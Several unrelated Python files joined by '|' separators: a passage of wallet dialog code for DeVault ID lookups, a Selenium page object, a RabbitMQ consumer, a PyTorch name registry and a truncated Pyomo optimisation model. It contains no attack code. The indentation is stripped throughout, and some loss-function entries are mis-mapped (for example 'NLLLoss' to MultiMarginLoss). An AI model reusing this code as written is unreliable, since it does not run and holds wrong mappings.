icon_file = ":icons/paper-plane.svg" if not ColorScheme.dark_scheme else ":icons/paper-plane_dark_theme.svg"
but = QPushButton(QIcon(icon_file), "")
if isinstance(info.address, Address):
payto_str = _("Pay to")
but.setToolTip(f'<span style="white-space:nowrap">{payto_str}<br> <b>{ca_string_em}</b></span>')
but.clicked.connect(lambda: parent.is_alive() and parent.payto_payees([ca_string_em]))
but.clicked.connect(d.reject)
else:
but.setDisabled(True)
but.setToolTip("<i>" + _("Unsupported Account Type") + "</i>")
return but
extra_buttons.append(create_payto_but)
# /Extra Buttons
ca = InfoGroupBox(frame, parent, button_type = button_type, title = '', extra_buttons=extra_buttons)
ca.refresh()
frame.setMinimumWidth(765)
frame.setMinimumHeight(250)
frame.setWidget(ca)
frame.setWidgetResizable(True)
vbox.addWidget(frame)
search.setDefault(True)
if ok_disables:
need_to_fwd_return = True
ok = OkButton(d)
ok.setDisabled(ok_disables)
vbox.addLayout(Buttons(CancelButton(d), ok))
else:
need_to_fwd_return = False
ok = CloseButton(d)
ok.setDefault(False)
vbox.addLayout(Buttons(ok))
def ca_msg(m, clear=False):
ca.no_items_text = m
if clear:
ca.setItems([], auto_resize_parent=False, title = '')
else:
ca.refresh()
tit_lbl.setText('')
def on_return_pressed():
if need_to_fwd_return and search.isEnabled():
search.click()
def on_text_changed(txt):
txt = txt.strip() if txt else ''
search.setEnabled(bool(wallet.cashacct.parse_string(txt)))
if not txt and not ca.items():
ca_msg(" ")
def on_search():
ok.setDisabled(ok_disables)
name = acct.text().strip()
tup = wallet.cashacct.parse_string(name)
if tup:
ca_msg(_("Searching for <b>{cash_account_name}</b> please wait ...").format(cash_account_name=name), True)
results = None
exc = []
t0 = time.time()
def resolve_verify():
nonlocal results
results = wallet.cashacct.resolve_verify(name, exc=exc)
code = VerifyingDialog(parent.top_level_window(),
_("Verifying DeVault ID {name} please wait ...").format(name=name),
resolve_verify, auto_show=False).exec_()
if code == QDialog.Rejected:
# user cancel -- the waiting dialog thread will continue to run in the background but that's ok.. it will be a no-op
d.reject()
return
if results:
ca.setItems(results, auto_resize_parent=False, title='', button_type = button_type) # suppress groupbox title
else:
ca_msg(_("The specified DeVault ID does not appear to be associated with any address"), True)
if time.time()-t0 >= cashacct.timeout:
if (wallet.verifier and wallet.synchronizer and # check these are still alive: these could potentially go away from under us if wallet is stopped when we get here.
(not wallet.verifier.is_up_to_date() or not wallet.synchronizer.is_up_to_date())):
parent.show_message(_("No results found. However, your wallet is busy updating."
" This can interfere with DeVault ID lookups."
" You may want to try again when it is done."))
else:
parent.show_message(_("A network timeout occurred while looking up this DeVault ID. "
"You may want to check that your internet connection is up and "
"not saturated processing other requests."))
elif exc and isinstance(exc[-1], requests.ConnectionError):
parent.show_error(_("A network connectivity error occured. Please check your internet connection and try again."))
nres = len(results or [])
title = "<b>" + name + "</b> - " + ngettext("{number} DeVault ID", "{number} DeVault IDs", nres).format(number=nres)
tit_lbl.setText(title)
else:
ca_msg(_("Invalid DeVault ID name, please try again"), True)
acct.textChanged.connect(on_text_changed)
search.clicked.connect(on_search)
acct.returnPressed.connect(on_return_pressed)
ca.buttonGroup().buttonClicked.connect(lambda x=None: ok.setEnabled(ok_disables and ca.selectedItem() is not None))
ca_msg(" ")
if d.exec_() == QDialog.Accepted:
return ca.selectedItems()
return None
def cash_account_detail_dialog(parent : MessageBoxMixin, # Should be an ElectrumWindow instance
ca_string : str, # Cash acount string eg: "satoshi#123.1
*, title : str = None # The modal dialog window title
) -> bool: # returns True on success, False on failure
''' Shows the DeVault ID details for any cash account.
Note that parent should be a ElectrumWindow instance.
`ca_string` is just a DeVault ID string of the form:
name#number[.collision_hash_prefix]
Returns False on failure or True on success. User is presented with an error
message box on False return.'''
from .main_window import ElectrumWindow
assert isinstance(parent, ElectrumWindow)
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
if not wallet.cashacct.parse_string(ca_string):
parent.show_error(_("Invalid DeVault ID:") + f" {ca_string}")
return False
ca_string = wallet.cashacct.strip_emoji(ca_string)
# validate ca_string arg & resolve if need be
info = wallet.cashacct.get_verified(ca_string)
if not info:
# need to look it up
tup = resolve_cashacct(parent, wallet)
if not tup:
# Error window was provided by resolve_cashacct, just return
return False
info, ca_string = tup
ca_string_em = ca_string + f" {info.emoji}"
parsed = wallet.cashacct.parse_string(ca_string)
assert parsed
minimal_chash = parsed[-1]
# . <-- at this point we have a verified cash account to display
# Make sure it's not an unsupported type as the code at the end of this
# file assumes info.address is an Address.
if not isinstance(info.address, Address):
parent.show_error(_("Unsupported payment data type.") + "\n\n"
+ _("The DeVault ID {name} uses an account type that "
"is not supported by Electron Cash.").format(name=ca_string))
return False
title = title or _("DeVault ID Details")
# create dialog window
d = WindowModalDialog(parent.top_level_window(), title)
d.setObjectName("WindowModalDialog - " + title)
finalization_print_error(d)
destroyed_print_error(d)
grid = QGridLayout(d)
em_lbl = QLabel(f'<span style="white-space:nowrap; font-size:75pt;">{info.emoji}</span>')
em_lbl.setToolTip(f'<span style="white-space:nowrap;">{ca_string_em}</span>')
grid.addWidget(em_lbl, 0, 0, 3, 1)
fsize = 26
if len(info.name) > 20:
fsize = 15
if len(info.name) > 30:
fsize = 12
if len(info.name) > 50:
fsize = 10
if len(info.name) > 90:
fsize = 8
name_txt = f'<span style="white-space:nowrap; font-size:{fsize}pt; font-weight:bold;">{info.name}<span style="font-size:18pt;">#{info.number}.'
if minimal_chash:
name_txt += f'{minimal_chash}'
name_txt += '</span></span>'
if len(minimal_chash) < len(info.collision_hash):
if not info.collision_hash.startswith(minimal_chash):
parent.print_error(f"WARNING: {ca_string} minimal_chash {minimal_chash} and collision_hash {info.collision_hash} mismatch!")
else:
extra = info.collision_hash[len(minimal_chash):]
name_txt += f'<span style="white-space:nowrap; font-size:11pt; font-weight:200;"><i>{extra}</i></span>'
def open_link(link):
if Address.is_valid(link):
addr = Address.from_string(link)
if wallet.is_mine(addr):
parent.show_address(addr)
else:
addr_URL = web.BE_URL(parent.config, 'addr', addr)
if addr_URL:
webopen(addr_URL)
return
if link.startswith('http'):
webopen(link)
elif len(link) == 64: # 64 character txid
tx = wallet.transactions.get(link)
if tx:
parent.show_transaction(tx, tx_desc=wallet.get_label(link))
else:
parent.do_process_from_txid(txid=link, tx_desc=wallet.get_label(link))
return
# name
name_lbl = QLabel(name_txt)
grid.addWidget(name_lbl, 0, 1, 1, 1)
# copy name
copy_name_but = QPushButton()
copy_name_but.setIcon(QIcon(":icons/copy.png"))
button_make_naked(copy_name_but)
copy_name_but.setToolTip('<span style="white-space:nowrap">'
+ _("Copy <b>{cash_account_name}</b>").format(cash_account_name=ca_string_em)
+ '</span>')
copy_name_but.clicked.connect(lambda ignored=None, ca_string_em=ca_string_em, copy_but=copy_name_but:
parent.copy_to_clipboard(text=ca_string_em, tooltip=_('DeVault ID copied to clipboard'), widget=copy_but) )
grid.addWidget(copy_name_but, 0, 2, 1, 1)
# address label
addr_lbl = QLabel(f'<span style="white-space:nowrap; font-size:15pt;"><a href="{info.address.to_ui_string()}"><pre>{info.address.to_ui_string()}</pre></a></span>')
addr_lbl.linkActivated.connect(open_link)
grid.addWidget(addr_lbl, 1, 1, 1, 1)
# copy address label
copy_addr_but = QPushButton()
copy_addr_but.setIcon(QIcon(":icons/copy.png"))
button_make_naked(copy_addr_but)
copy_addr_but.setToolTip(_("Copy {}").format(_("Address")))
copy_addr_but.clicked.connect(lambda ignored=None, text=info.address.to_ui_string(), copy_but=copy_addr_but:
parent.copy_to_clipboard(text=text, tooltip=_('Address copied to clipboard'), widget=copy_but) )
grid.addWidget(copy_addr_but, 1, 2, 1, 1)
if not wallet.is_mine(info.address):
ismine_txt = _("External Address") + ', '
else:
ismine_txt = ''
# Mined in block
viewtx_txt = _("Mined in block")
view_tx_lbl = QLabel(f'<span style="white-space:nowrap; font-size:11pt;">{ismine_txt}{viewtx_txt}: <a href="{info.txid}">{cashacct.num2bh(info.number)}</a></span>')
view_tx_lbl.setToolTip(_("View Registration Transaction"))
view_tx_lbl.linkActivated.connect(open_link)
grid.addWidget(view_tx_lbl, 2, 1, 1, 1, Qt.AlignTop | Qt.AlignRight)
grid.setRowStretch(2, 1)
# QR
tabs = QTabWidget()
full_addr_str = info.address.to_full_ui_string()
qr_address = QRCodeWidget(full_addr_str, fixedSize=True)
qr_address.setToolTip(full_addr_str)
tabs.addTab(qr_address, _("Address"))
qr_ca_string = QRCodeWidget(ca_string, fixedSize=True)
qr_ca_string.setToolTip(ca_string)
tabs.addTab(qr_ca_string, _("DeVault ID"))
qr_address.setMinimumSize(300, 300)
qr_ca_string.setMinimumSize(300, 300)
grid.addWidget(tabs, 3, 0, 1, -1, Qt.AlignTop | Qt.AlignHCenter)
def_but = QPushButton()
mk_def_txt = _("Make default for address")
is_def_txt = _("Is default for address")
mk_def_tt = _("Make this DeVault ID the default for this address")
is_def_tt = _("DeVault ID has been made the default for this address")
def make_default():
wallet.cashacct.set_address_default(info)
parent.ca_address_default_changed_signal.emit(info) # updates all concerned widgets, including self
tt = is_def_txt
QToolTip.showText(QCursor.pos(), tt, def_but)
def update_def_but(new_def):
if new_def and new_def.address != info.address:
# not related, abort
return
if new_def != info:
def_but.setDisabled(False)
def_but.setText(mk_def_txt)
def_but.setToolTip(mk_def_tt)
else:
def_but.setDisabled(True)
def_but.setText(is_def_txt)
def_but.setToolTip(is_def_tt)
def_but.clicked.connect(make_default)
infos = wallet.cashacct.get_cashaccounts([info.address])
def_now = infos and wallet.cashacct.get_address_default(infos)
if wallet.is_mine(info.address):
update_def_but(def_now)
else:
def_but.setHidden(True) # not related to wallet, hide the button
del infos, def_now
# Bottom buttons
buttons = Buttons(def_but, OkButton(d))
grid.addLayout(buttons, 4, 0, -1, -1)
# make all labels allow select text & click links
for c in d.children():
if isinstance(c, QLabel):
c.setTextInteractionFlags(c.textInteractionFlags() | Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse)
try:
parent.ca_address_default_changed_signal.connect(update_def_but)
d.exec_()
finally:
# Unconditionally detach slot to help along Python GC
try: parent.ca_address_default_changed_signal.disconnect(update_def_but)
except TypeError: pass
return True
|
from urllib import parse
from pages.group_page import GroupPage
from pages.my_groups_components import GroupCreateDialog, GroupCreateButton
from pages.page import Page
class MyGroupsPage(Page):
def create_public_page(self, description: dict) -> GroupPage:
self.group_create_button.click()
create_dialog = GroupCreateDialog(self.driver)
create_dialog.choose_public_page(description)
path = parse.urlparse(self.driver.current_url).path
return GroupPage(self.driver, path=path)
@property
def group_create_button(self) -> GroupCreateButton:
return GroupCreateButton(self.driver)
|
import json
import pathlib
import pika
from app.utils.config import SETTINGS
from app.utils.logger import logger
USERNAME = SETTINGS.rabbitmq_default_user
PASSWORD = SETTINGS.rabbitmq_default_pass
HOST = SETTINGS.rabbitmq_host
RABBITMQ_CONNECTION_ATTEMPTS = SETTINGS.rabbitmq_connection_attempts
RABBITMQ_RETRY_DELAY = SETTINGS.rabbitmq_retry_delay
QUEUE_NAME = SETTINGS.rabbitmq_queue_name
OUTPUT_FILE = pathlib.Path().absolute() / 'output.txt'
FILE = None
def callback(
ch: pika.adapters.blocking_connection.BlockingChannel,
method: pika.spec.Basic.Deliver,
properties: pika.spec.BasicProperties,
body: bytes
):
"""
Callback function to consume message from the queue.
Collects message and saves to OUTPUT_FILE.
"""
try:
element = json.loads(body)
if FILE is not None:
FILE.writelines([json.dumps(element), '\n'])
ch.basic_ack(delivery_tag=method.delivery_tag)
logger.info(f' [✓] Received {body!r} on queue {QUEUE_NAME}')
except json.decoder.JSONDecodeError:
ch.basic_nack(delivery_tag=method.delivery_tag, requeue=False)
logger.info(f' [x] Rejected {body!r} on queue {QUEUE_NAME}')
def consume_queue():
"""Consumes from the queue using the callback."""
credentials = pika.PlainCredentials(USERNAME, PASSWORD)
connection = pika.BlockingConnection(
pika.ConnectionParameters(
host=HOST,
credentials=credentials,
connection_attempts=RABBITMQ_CONNECTION_ATTEMPTS,
retry_delay=RABBITMQ_RETRY_DELAY,
)
)
channel = connection.channel()
logger.info(f'Connected pika consumer to {HOST}')
channel.queue_declare(queue=QUEUE_NAME, durable=True)
channel.basic_consume(
queue=QUEUE_NAME,
on_message_callback=callback
)
logger.info(' [*] Waiting for messages on queue.')
try:
channel.start_consuming()
except KeyboardInterrupt:
pass
except Exception as e:
logger.exception(e)
finally:
if channel.is_open:
logger.debug('channel closed')
channel.close()
if connection.is_open:
logger.debug('connection closed')
connection.close()
if __name__ == '__main__':
FILE = open(OUTPUT_FILE, 'a', buffering=1)
consume_queue()
if FILE is not None:
FILE.close()
logger.debug(f'{OUTPUT_FILE} closed')
|
# Copyright 2020 winshare
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************** #
# #
# ::: :::::::: #
# description.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: winshare <winshare@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/06/08 15:42:45 by winshare #+# #+# #
# Updated: 2020/06/08 15:42:45 by winshare ### ########.fr #
# #
# **************************************************************************** #
from Data.DataSets.NPY.segmentation_dataset import Costum_NPY_DataSet
from Data.DataSets.CitysCapes.cityscapes import CityscapesSegmentation
from Data.DataSets.COCO.coco import CocoDataset
from Data.DataSets.PascalVoc.pascal import VOCSegmentation
from Src.Nets.BackBone.efficientnet.model import EfficientNet
from Src.Nets.BackBone.xception import AlignedXception as xception
from Src.Nets.BackBone.mobilenetv3 import MobileNetV3_Large,MobileNetV3_Small
import torchvision.models as models
import torchvision.datasets as dataset
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
class Description():
def __init__(self):
# ---------------------------------------------------------------------------- #
# Pytorch Function Dictionary #
# ---------------------------------------------------------------------------- #
self.datasets_function_dict={
"Classification":{
"MINST":dataset.MNIST,
"FashionMINST":dataset.FashionMNIST,
"KMINST":dataset.KMNIST,
"EMINST":dataset.EMNIST,
"CIFAR10":dataset.CIFAR10,
"CIFAR100":dataset.CIFAR100,
"ImageNet":dataset.ImageNet
},
"Detection":{
"CocoDetection":CocoDataset,
"VOC_Detection":dataset.VOCDetection
},
"Segmentation":{
"VOC_Segmentation":dataset.VOCSegmentation,
"Cityscapes":dataset.Cityscapes,
"Costum_NPY_DataSet":Costum_NPY_DataSet,
"CocoSegmentation":CocoDataset
},
"Caption":{
"CocoCaptions":dataset.CocoCaptions
},
"InstenceSegmentation":{
"CocoDetection":CocoDataset
}
}
self.dataset_support_list=self.datasets_function_dict.keys()
self.OptimDict={
"SGD":optim.SGD,
"ASGD":optim.ASGD,
"Adam":optim.Adam,
"Adadelta":optim.Adadelta,
"Adagrad":optim.Adagrad,
"AdamW":optim.AdamW,
"LBFGS":optim.LBFGS,
"RMSprop":optim.RMSprop,
"SparseAdam":optim.SparseAdam,
"Adamax":optim.Adamax
}
self.Loss_Function_Dict={
"AdaptiveLogSoftmaxWithLoss":nn.AdaptiveLogSoftmaxWithLoss
,"BCELoss":nn.BCELoss
,"BCEWithLogitsLoss":nn.BCEWithLogitsLoss
,"CosineEmbeddingLoss":nn.CosineEmbeddingLoss
,"CrossEntropyLoss":nn.CrossEntropyLoss
,"CTCLoss":nn.CTCLoss
,"cosine_embedding_loss":F.cosine_embedding_loss
,"ctc_loss":F.ctc_loss
,"hinge_embedding_loss":F.hinge_embedding_loss
,"l1_loss":F.l1_loss
,"margin_ranking_loss":F.margin_ranking_loss
,"mse_loss":F.mse_loss
,"multi_margin_loss":F.mse_loss
,"multilabel_margin_loss":F.multilabel_margin_loss
,"multilabel_soft_margin_loss":F.multilabel_margin_loss
,"nll_loss":F.nll_loss
,"poisson_nll_loss":F.poisson_nll_loss
,"smooth_l1_loss":F.smooth_l1_loss
,"soft_margin_loss":F.soft_margin_loss
,"triplet_margin_loss":F.triplet_margin_loss
,"HingeEmbeddingLoss":nn.HingeEmbeddingLoss
,"KLDivLoss":nn.KLDivLoss
,"L1Loss":nn.L1Loss
,"MarginRankingLoss":nn.MarginRankingLoss
,"MSELoss":nn.MSELoss
,"MultiLabelMarginLoss":nn.MultiLabelMarginLoss
,"MultiLabelSoftMarginLoss":nn.MultiLabelSoftMarginLoss
,"MultiMarginLoss":nn.MultiMarginLoss
,"NLLLoss":nn.MultiMarginLoss
,"PoissonNLLLoss":nn.PoissonNLLLoss
,"SmoothL1Loss":nn.SmoothL1Loss
,"SoftMarginLoss":nn.SoftMarginLoss
,"TripletMarginLoss":nn.TripletMarginLoss
}
self.Lr_Dict={
"StepLR":optim.lr_scheduler.StepLR,
"MultiStepLR":optim.lr_scheduler.MultiStepLR,
"ExponentialLR":optim.lr_scheduler.ExponentialLR,
"CosineAnnealingLR":optim.lr_scheduler.CosineAnnealingLR,
"ReduceLROnPlateau":optim.lr_scheduler.ReduceLROnPlateau,
"CyclicLR":optim.lr_scheduler.CyclicLR,
"OneCycleLR":optim.lr_scheduler.OneCycleLR,
"CosineAnnealingWarmRestarts":optim.lr_scheduler.CosineAnnealingWarmRestarts
}
self.BackBoneDict={
# ------------------------------ Official Model ------------------------------ #
"resnet18" :models.resnet18,
"alexnet" :models.alexnet,
"vgg16" :models.vgg16,
"squeezenet":models.squeezenet1_0,
"densenet": models.densenet161,
"inception":models.inception_v3,
"googlenet ": models.googlenet,
"shufflenet ":models.shufflenet_v2_x1_0,
"mobilenet ": models.mobilenet_v2,
"resnext50_32x4d":models.resnext50_32x4d,
"wide_resnet50_2" :models.wide_resnet50_2,
"mnasnet": models.mnasnet1_0,
# ------------------------------- Custom Model ------------------------------- #
'efficientnet-b0':EfficientNet.from_name('efficientnet-b0'),
'efficientnet-b1':EfficientNet.from_name('efficientnet-b1'),
'efficientnet-b2':EfficientNet.from_name('efficientnet-b2'),
'efficientnet-b3':EfficientNet.from_name('efficientnet-b3'),
'efficientnet-b4':EfficientNet.from_name('efficientnet-b4'),
'efficientnet-b5':EfficientNet.from_name('efficientnet-b5'),
'efficientnet-b6':EfficientNet.from_name('efficientnet-b6'),
'efficientnet-b7':EfficientNet.from_name('efficientnet-b7'),
"xception":xception,
"mobilenetv3_s":MobileNetV3_Small,
"mobilenetv3_l":MobileNetV3_Large
}
"""
update plan :
* ResNest(https://github.com/zhanghang1989/ResNeSt.git)
* DetectorRS(https://github.com/joe-siyuan-qiao/DetectoRS.git)
"""
# ---------------------------------------------------------------------------- #
# The Custom Network for different mission like : #
# ---------------------------------------------------------------------------- #
"""
### Detection:
* Yolov3(https://github.com/ayooshkathuria/pytorch-yolo-v3)
* Cascade FPN RCNN()
* EfficientDet(https://github.com/zylo117/Yet-Another-EfficientDet-Pytorch.git)
### Semantic Segmentation
* [Deeplab(DeepLab_ResNeSt269_PContext)](https://hangzhang.org/PyTorch-Encoding/model_zoo/segmentation.html)
### Instance Segmentation
* YOLACT(https://github.com/dbolya/yolact.git)
"""
self.DetectionDict={
}
self.InstanceSegmentationDict={
}
self.DetectionDict={
}
print("# ---------------------------------------------------------------------------- #")
print("# Description Init Done #")
print("# ---------------------------------------------------------------------------- #")
|
# MINLP written by GAMS Convert at 04/21/18 13:54:22
#
# Equation counts
# Total E G L N X C B
# 85 29 0 56 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 217 33 184 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 657 633 24 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.b1 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b3 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b4 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b5 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b6 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b7 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b8 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b9 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b10 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b11 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b12 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b13 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b14 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b15 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b16 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b17 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b18 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b19 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b20 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b21 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b22 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b23 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b24 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b25 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b26 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b27 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b28 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b29 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b30 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b31 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b32 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b33 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b34 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b35 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b36 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b37 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b38 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b39 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b40 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b41 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b42 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b43 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b44 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b45 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b46 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b47 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b48 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b49 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b50 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b51 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b52 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b53 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b54 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b55 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b56 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b57 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b58 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b59 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b60 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b61 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b62 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b63 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b64 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b65 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b66 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b67 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b68 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b69 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b70 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b71 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b72 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b73 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b74 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b75 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b76 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b77 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b78 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b79 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b80 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b81 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b82 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b83 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b84 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b85 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b86 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b87 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b88 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b89 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b90 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b91 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b92 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b93 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b94 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b95 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b96 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b97 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b98 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b99 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b100 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b101 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b102 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b103 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b104 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b105 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b106 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b107 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b108 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b109 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b110 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b111 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b112 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b113 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b114 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b115 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b116 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b117 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b118 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b119 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b120 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b121 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b122 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b123 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b124 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b125 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b126 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b127 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b128 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b129 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b130 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b131 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b132 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b133 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b134 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b135 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b136 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b137 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b138 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b139 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b140 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b141 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b142 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b143 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b144 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b145 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b146 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b147 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b148 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b149 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b150 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b151 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b152 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b153 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b154 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b155 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b156 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b157 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b158 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b159 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b160 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b161 = Var(within=Binary,bounds=(0,1),initialize=0)
